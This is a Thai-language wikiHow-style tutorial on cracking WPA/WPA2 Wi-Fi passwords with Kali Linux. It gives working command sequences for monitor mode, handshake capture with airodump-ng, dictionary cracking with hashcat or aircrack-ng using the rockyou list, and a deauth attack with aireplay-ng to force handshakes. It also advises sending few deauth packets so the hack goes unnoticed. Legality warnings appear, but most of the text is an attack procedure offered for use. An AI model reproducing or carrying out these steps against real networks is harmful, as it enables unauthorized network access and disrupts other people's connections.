ดาวน์โหลดบทความ
ดาวน์โหลดบทความ
บทความวิกิฮาวนี้จะแนะนำวิธีการค้นหารหัสผ่านของสัญญาณ Wi-Fi แบบ WPA หรือ WPA2 โดยแฮกระบบด้วย Kali Linux
ขั้นตอน
-
แฮก Wi-Fi ยังไงไม่ให้ผิดกฎหมาย. ไม่ว่าจะประเทศไหน ถ้าจะไม่ให้ผิดกฎหมาย คือต้องแฮก Wi-Fi แบบ WPA หรือ WPA2 ของตัวเองเท่านั้น อีกทีคือเน็ตของคนอื่นที่เขาอนุญาตแล้วว่าให้คุณแฮกเพื่อเข้าใช้งานได้ เช่น ลืมรหัสผ่าน
- ถ้าไม่เข้าข่ายนี้แล้วไปแอบแฮก Wi-Fi ใคร ก็ผิดกฎหมายเต็มๆ ดีไม่ดีอาจถึงขั้นโดนฟ้องหรือดำเนินคดีได้เลย
-
ดาวน์โหลด disk image ของ Kali Linux. แนะนำให้ใช้ Kali Linux เวลาแฮก Wi-Fi แบบ WPA กับ WPA2 คุณดาวน์โหลดไฟล์อิมเมจติดตั้ง Kali Linux (ISO) ได้โดยทำตามขั้นตอนต่อไปนี้
- เข้าเว็บ https://www.kali.org/downloads/ ด้วยเบราว์เซอร์ของคอม
- คลิก HTTP ข้างเวอร์ชั่น Kali ที่จะใช้
- รอจนดาวน์โหลดไฟล์เสร็จ
-
เสียบแฟลชไดรฟ์กับคอม. ขั้นตอนนี้ต้องใช้แฟลชไดรฟ์ที่จุได้อย่างน้อย 4 GB ขึ้นไป
-
ทำแฟลชไดรฟ์สำหรับบูทเครื่อง . จะติดตั้งจากแฟลชไดรฟ์ USB ได้ต้องเตรียมแฟลชไดรฟ์สำหรับบูทเครื่องซะก่อน
- ขั้นตอนนี้จะ ทำในเครื่อง Mac ก็ได้
-
ใส่ไฟล์ ISO ของ Kali Linux ในแฟลชไดรฟ์. เปิดแฟลชไดรฟ์ แล้วลากไฟล์ ISO ของ Kali Linux ที่ดาวน์โหลดมา ไปใส่ในหน้าต่างของแฟลชไดรฟ์
- ต้องเสียบแฟลชไดรฟ์ USB ทิ้งไว้จนกว่าจะทำตามขั้นตอนจนเสร็จสิ้น
-
ติดตั้ง Kali Linux. จะติดตั้ง Kali Linux ในคอม ให้ทำตามขั้นตอนต่อไปนี้
- รีสตาร์ทเครื่อง Windows
- เข้าเมนู BIOS
- ตั้งค่าให้คอมบูทเครื่องจากไดรฟ์ USB โดยหาหัวข้อ "Boot Options" (หรืออะไรที่ใกล้เคียง) เลือกชื่อไดรฟ์ USB แล้วขยับขึ้นไปที่ด้านบนสุดของรายชื่อ
- เซฟแล้วออกไป จากนั้นรอจนหน้าต่างติดตั้ง Kali Linux โผล่มา (อาจจะต้องรีสตาร์ทคอมอีกรอบ)
- ติดตั้ง Kali Linux ไปตามขั้นตอนที่ปรากฏ
-
ซื้อการ์ด Wi-Fi ที่ monitor ได้. คุณหาซื้อการ์ด Wi-Fi ได้จากในเน็ต หรือร้านคอมต่างๆ ตามห้าง โดยเลือกการ์ด Wi-Fi ที่ monitor (RFMON) หรือตรวจติดตามระบบได้ ไม่งั้นจะแฮก Wi-Fi ไม่ได้
- คอมหลายเครื่องมีการ์ด Wi-Fi แบบ RFMON ในตัว เพราะงั้นให้ลองทำ 4 ขั้นตอนแรกของส่วนถัดไปดู ก่อนจะหาซื้อการ์ดใหม่
- ถ้าใช้ Kali Linux แบบ virtual machine ก็ต้องใช้การ์ด Wi-Fi อยู่ดี ไม่ว่าคอมจะใช้การ์ดไหนอยู่
-
ล็อกอินเข้าคอม Kali Linux ในฐานะ root. พิมพ์ root username และรหัสผ่านตอนล็อกอิน
- ต้องใช้บัญชี root ตลอดขั้นตอนการแฮก
-
เสียบการ์ด Wi-Fi ที่เครื่อง Kali Linux. แล้วการ์ดจะเริ่มติดตั้งและดาวน์โหลดไดรฟ์เวอร์ให้ตัวเองทันที ถ้ามี ให้ทำตามขั้นตอนที่ปรากฏในหน้าจอจนเสร็จสิ้น หลังจากนั้นก็เริ่มแฮก Wi-Fi ตามต้องการได้เลย
- ถึงเคยติดตั้งการ์ดในคอมแล้วก่อนหน้านี้ ก็ยังต้องตั้งค่าให้ใช้กับ Kali Linux โดยเสียบการ์ดอีกทีอยู่ดี
- ส่วนใหญ่ก็แค่เสียบการ์ดที่คอม เท่านี้ก็ติดตั้งเรียบร้อย
โฆษณา
-
เปิด Terminal ใน Kali Linux. หาแล้วคลิกไอคอนแอพ Terminal ที่เป็น ">_" สีขาวบนพื้นดำ
- หรือแค่กด Alt + Ctrl + T ก็เปิด Terminal ได้แล้ว
-
พิมพ์คำสั่งติดตั้ง Aircrack-ng. ให้พิมพ์คำสั่งต่อไปนี้ แล้วกด ↵ Enter
sudo apt-get install aircrack-ng
-
พิมพ์รหัสผ่านตอนถูกถาม. พิมพ์รหัสผ่านที่ใช้ล็อกอินเข้าคอม แล้วกด ↵ Enter เพื่อเปิดใช้งาน root access เวลาใช้ทุกคำสั่งใน Terminal
- ถ้าเปิดอีกหน้าต่าง Terminal (ในขั้นตอนต่อๆ ไปของบทความนี้) อาจจะต้องป้อนคำสั่งโดยพิมพ์ sudo ไว้ข้างหน้า และ/หรือป้อนรหัสผ่านซ้ำอีกรอบ
-
ติดตั้ง Aircrack-ng. กด Y ตอนที่ขึ้น แล้วรอจนโปรแกรมติดตั้งเสร็จ
-
เปิด airmon-ng. พิมพ์คำสั่งต่อไปนี้ แล้วกด ↵ Enter
airmon-ng
-
หาชื่อ monitor. ปกติจะอยู่ในคอลัมน์ "Interface"
- ถ้าจะแฮกเน็ตตัวเอง ปกติชื่อจะขึ้นว่า "wlan0"
- ถ้าไม่เจอชื่อ monitor แสดงว่าการ์ด Wi-Fi คุณใช้ฟังก์ชั่น monitoring ไม่ได้
-
เริ่ม monitor สัญญาณเน็ต. โดยพิมพ์คำสั่งต่อไปนี้ แล้วกด ↵ Enter
airmon-ng start wlan0
- อย่าลืมเปลี่ยน "wlan0" เป็นชื่อสัญญาณเน็ตที่จะแฮกก่อน ถ้าไม่ใช่ชื่อนี้
-
เปิดใช้ monitor mode interface. โดยพิมพ์คำสั่งต่อไปนี้
iwconfig
-
หยุดทุก processes ที่เจอ error. บางทีการ์ด Wi-Fi ก็ไปทำงานขัดกันกับ services ที่ใช้งานอยู่ของคอม แบบนี้ให้ kill หรือหยุดการทำงานของ processes นั้นๆ โดยพิมพ์คำสั่งต่อไปนี้ [1] X แหล่งข้อมูลอ้างอิง
airmon-ng check kill
-
เช็คชื่อ monitor interface. ส่วนใหญ่ชื่อที่ขึ้นจะเป็น "mon0" หรือ "wlan0mon" [2] X แหล่งข้อมูลอ้างอิง
-
บอกให้คอมตรวจจับเราเตอร์ในบริเวณใกล้เคียง. ถ้าอยากได้รายชื่อเราเตอร์ทั้งหมดในระยะสัญญาณ ให้พิมพ์คำสั่งต่อไปนี้
airodump-ng mon0
- อย่าลืมเปลี่ยน "mon0" เป็นชื่อ monitor interface ในขั้นตอนที่แล้ว
-
หาเราเตอร์ที่จะแฮก. ท้ายทุก string ข้อความ จะมีชื่อขึ้น ให้หาที่ตรงกับสัญญาณเน็ตที่จะแฮก
-
เช็คว่าเราเตอร์ใช้การเข้ารหัสแบบ WPA หรือ WPA2. ถ้ามี "WPA" หรือ "WPA2" ขึ้นทางซ้ายของชื่อสัญญาณเน็ตเลย ก็ไปต่อได้ แต่ถ้าไม่มีแสดงว่าแฮกสัญญาณเน็ตนั้นไม่ได้
-
จด MAC address กับ channel number ของเราเตอร์. โดย 2 ข้อมูลนี้จะอยู่ทางซ้ายของชื่อสัญญาณเน็ต
- MAC address — จะเป็นบรรทัดหมายเลข ทางซ้ายสุดของบรรทัดข้อมูลของเราเตอร์
- Channel — จะเป็นหมายเลข (เช่น 0, 1 และ 2 เป็นต้น) ทางซ้ายติดกับแท็ก WPA หรือ WPA2
-
คอยติดตามหรือ monitor การ handshake ที่เกิดขึ้นผ่านสัญญาณเน็ตที่จะแฮก. การ "handshake" จะเกิดขึ้นเมื่อมีอะไรก็ตามเชื่อมต่อสัญญาณเน็ตนั้น (เช่น ตอนคอมเชื่อมต่อกับเราเตอร์) ให้พิมพ์โค้ดต่อไปนี้ โดยเช็คให้ชัวร์ว่าเปลี่ยนส่วนสำคัญในคำสั่งเป็นข้อมูลของสัญญาณเน็ตนั้นแล้ว
airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0
- ให้เปลี่ยน "channel" เป็นหมายเลข channel ที่ได้ในขั้นตอนที่แล้ว
- เปลี่ยน "MAC" เป็น MAC address ที่ได้ในขั้นตอนที่แล้วเช่นกัน
- อย่าลืมเปลี่ยน "mon0" ตามชื่อ interface ด้วย
- ตัวอย่าง address ที่ได้จะออกมาเป็น
airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon
-
รอจนมีการ handshake. พอเห็นข้อมูลขึ้นพร้อมแท็ก "WPA handshake:" ตามด้วย MAC address ที่มุมขวาบนของหน้าจอ ก็ทำขั้นตอนต่อไปได้เลย
- ถ้าขี้เกียจรอ ให้ บังคับ handshake ด้วย deauth attack แทน แล้วค่อยทำขั้นตอนในส่วนนี้ต่อไป
-
ออกจาก แล้วเปิด desktop. กด Ctrl + C เพื่อปิด แล้วเช็คว่ามีไฟล์ ".cap" โผล่มาในหน้า desktop ของคอม
-
เปลี่ยนชื่อไฟล์ ".cap" . ถึงจะไม่บังคับ แต่จะง่ายกว่าในขั้นตอนหลังๆ ให้ใส่คำสั่งต่อไปนี้เพื่อเปลี่ยนชื่อ ต้องแน่ใจว่าแทนที่ "name" ด้วยชื่อไฟล์ที่ต้องการแล้ว
mv ./-01.cap name.cap
- ถ้าไฟล์ ".cap" ไม่ได้ชื่อ "-01.cap" ให้เปลี่ยน "-01.cap" เป็นชื่อไฟล์ ".cap" ของคุณ
-
แปลงไฟล์ ".cap" เป็นฟอร์แมต ".hccapx" . โดยใช้ตัวแปลงไฟล์ของ Kali Linux ให้พิมพ์คำสั่งต่อไปนี้ โดยเปลี่ยน "name" เป็นชื่อไฟล์ของคุณ
cap2hccapx.bin name.cap name.hccapx
- หรือจะเข้าเว็บ https://hashcat.net/cap2hccapx/ แล้วอัพโหลดไฟล์ ".cap" เข้าเว็บแปลงไฟล์ โดยคลิก Choose File แล้วเลือกไฟล์ที่ต้องการ พออัพโหลดไฟล์แล้ว ให้คลิก Convert เพื่อแปลงไฟล์ จากนั้นดาวน์โหลดกลับไปที่หน้า desktop แล้วค่อยทำขั้นตอนต่อไป
-
ติดตั้ง naive-hashcat. ที่เป็น service สำหรับ crack รหัสผ่าน โดยพิมพ์คำสั่งต่อไปนี้ตามลำดับ
sudo git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- ถ้าคอมไม่มี GPU ให้ ใช้ aircrack-ng แทน
-
เปิด naive-hashcat. พอติดตั้งเสร็จแล้ว ให้พิมพ์คำสั่งต่อไปนี้ (อย่าลืมแทนที่ทุกจุดที่เป็น "name" ด้วยชื่อไฟล์ ".cap")
HASH_FILE = name.hccapx POT_FILE = name.pot HASH_TYPE = 2500 ./naive-hashcat.sh
-
รอจน crack รหัสผ่าน Wi-Fi ได้. พอแฮกรหัสผ่านได้แล้ว string รหัสผ่านจะถูกเพิ่มเข้าไปในไฟล์ "name.pot" ที่อยู่ใน directory ชื่อ "naive-hashcat" โดยคำหรือวลีหลัง colon อันสุดท้าย นั่นแหละ string รหัสผ่าน
- กว่าจะ crack รหัสผ่านได้ บางทีก็ใช้เวลา 2 - 3 ชั่วโมงไปจนถึง 2 - 3 เดือน
โฆษณา
-
ดาวน์โหลดไฟล์ dictionary. ไฟล์ dictionary ที่นิยมใช้กันมากที่สุด คือ "Rock You" คุณดาวน์โหลดได้โดยพิมพ์คำสั่งต่อไปนี้
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- อธิบายกันก่อนว่าจะใช้ aircrack-ng crack รหัสผ่าน WPA หรือ WPA2 ไม่ได้ ถ้ารหัสผ่านนั้นไม่ได้อยู่ในรายชื่อคำหรือ word list
-
สั่งให้ aircrack-ng เริ่ม crack รหัสผ่าน. พิมพ์คำสั่งต่อไปนี้ โดยใช้ข้อมูลที่จำเป็นของสัญญาณเน็ตที่จะแฮก
aircrack-ng -a2 -b MAC -w rockyou.txt name.cap
- ถ้าจะ crack รหัสผ่าน Wi-Fi แบบ WPA แทน WPA2 ให้เปลี่ยน "-a2" เป็น -a
- เปลี่ยน "MAC" เป็น MAC address ที่ได้ในส่วนที่แล้วของบทความ
- เปลี่ยน "name" เป็นชื่อไฟล์ ".cap"
-
รอจน Terminal แสดงผล. พอมีหัวข้อ "KEY FOUND!" โผล่มา ก็แสดงว่า aircrack-ng เจอรหัสผ่านเรียบร้อยแล้ว จะมีรหัสผ่านโผล่มาในวงเล็บ ทางขวาของหัวข้อ "KEY FOUND!"โฆษณา
-
1deauth attack ใช้ยังไง. deauth attacks จะส่ง deauthentication packets อันตรายไปยังเราเตอร์ที่คุณพยายามจะแฮก จนทำให้เน็ตตัด ผู้ใช้ต้องล็อกอินกลับเข้ามาใหม่ พอล็อกอินกลับเข้ามา ก็จะเกิดการ handshake
-
monitor สัญญาณเน็ต. พิมพ์คำสั่งต่อไปนี้ โดยใช้ข้อมูลที่จำเป็นของสัญญาณเน็ตที่จะแฮก
airodump-ng -c channel --bssid MAC
- เช่น
airodump-ng -c 1 --bssid 9C:5C:8E:C9:AB:C0
- เช่น
-
รอจนมีอะไรต่อเน็ต. พอเห็น 2 MAC address โผล่มาข้างกัน (รวมถึง string ข้อความที่มีชื่อยี่ห้อข้างๆ) ก็ทำขั้นตอนต่อไปได้เลย
- แปลว่า client (เช่น คอม) ได้เชื่อมต่อสัญญาณอินเทอร์เน็ตเรียบร้อยแล้ว
-
เปิด Terminal หน้าต่างใหม่. โดยกด Alt + Ctrl + T ต้องเช็คก่อนว่า airodump-ng นั้นยังทำงานอยู่ที่เบื้องหลังของหน้าต่าง Terminal
-
ส่ง deauth packets. ให้พิมพ์คำสั่งต่อไปนี้ โดยใช้ข้อมูลที่จำเป็นของสัญญาณอินเทอร์เน็ตที่จะแฮก [3] X แหล่งข้อมูลอ้างอิง
aireplay-ng -0 2 -a MAC1 -c MAC2 mon0
- "2" ตรงนี้คือจำนวน packets ที่ส่งไป คุณจะเพิ่มหรือลดจำนวนก็ได้ แต่ต้องระวังว่าถ้าส่งไปเกิน 2 packets อาจเป็นการเปิดเผยว่ามีการแฮกระบบ
- เปลี่ยน "MAC1" เป็น MAC address ซ้ายสุด ที่ท้ายหน้าต่าง Terminal ในเบื้องหลัง
- เปลี่ยน "MAC2" เป็น MAC address ขวาสุด ที่ท้ายหน้าต่าง Terminal ในเบื้องหลัง
- อย่าลืมเปลี่ยน "mon0" เป็นชื่อ interface ที่เจอตอนคอมสแกนหาเราเตอร์ตอนแรก
- คำสั่งที่ได้จะออกมาหน้าตาประมาณนี้
aireplay-ng -0 3 -a 9C:5C:8E:C9:AB:C0 -c 64 :BC:0C:48:97:F7 mon0
-
เปิดหน้าต่าง Terminal แรกสุดอีกครั้ง. หลังส่ง deauth packets เสร็จแล้ว ให้กลับไปยังหน้าต่าง Terminal ที่ทำงานอยู่เบื้องหลัง
-
โฆษณา
เคล็ดลับ
- ก่อนจะปล่อยเซิร์ฟเวอร์ออนไลน์ แนะนำให้ใช้วิธีการในบทความนี้ทดสอบหาช่องโหว่ของสัญญาณ Wi-Fi ที่ใช้อยู่ซะก่อน เป็นการเตรียมระบบเผื่อถูกใครโจมตีแบบเดียวกัน
โฆษณา
คำเตือน
- ถ้าส่งไปเกิน 2 deauth packets ระวังคอมปลายทางจะล่มจนยิ่งดูน่าสงสัย
- การแฮกเข้าสัญญาณ Wi-Fi ของคนอื่นโดยไม่ได้รับอนุญาตนั้นผิดกฎหมายแน่นอนในแทบทุกประเทศ เพราะงั้นขอให้ใช้วิธีการในบทความนี้เฉพาะทดสอบสัญญาณเน็ตของตัวเอง หรือสัญญาณเน็ตของคนที่รับรู้และอนุญาตแล้วเท่านั้น
โฆษณา
ข้อมูลอ้างอิง
โฆษณา